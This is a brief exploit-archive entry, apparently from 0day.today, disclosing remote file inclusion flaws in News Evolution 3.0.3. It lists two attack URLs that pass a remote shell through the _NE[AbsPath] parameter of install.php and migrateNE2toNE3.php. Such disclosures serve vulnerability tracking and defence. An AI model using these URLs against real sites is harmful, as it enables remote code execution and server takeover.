id: 801
date: 09/06/2006
title: News Evolution 3.0.3 _NE[AbsPath] Remote File Include Vulnerabilities
author: ddoshomo
cves: 

=====================================================================
News Evolution 3.0.3 _NE[AbsPath] Remote File Include Vulnerabilities
=====================================================================



# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
# News Evolution v3.0.3 - Remote File Include Vulnerabilities
 
# Script  :  News Evolution v3.0.3
 
# Credits : ERNE
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/install.php?_NE[AbsPath]=[shell]
  
     http://www.site.com/[path]/migrateNE2toNE3.php?_NE[AbsPath]=[shell]



#  0day.today [2023-03-22]  #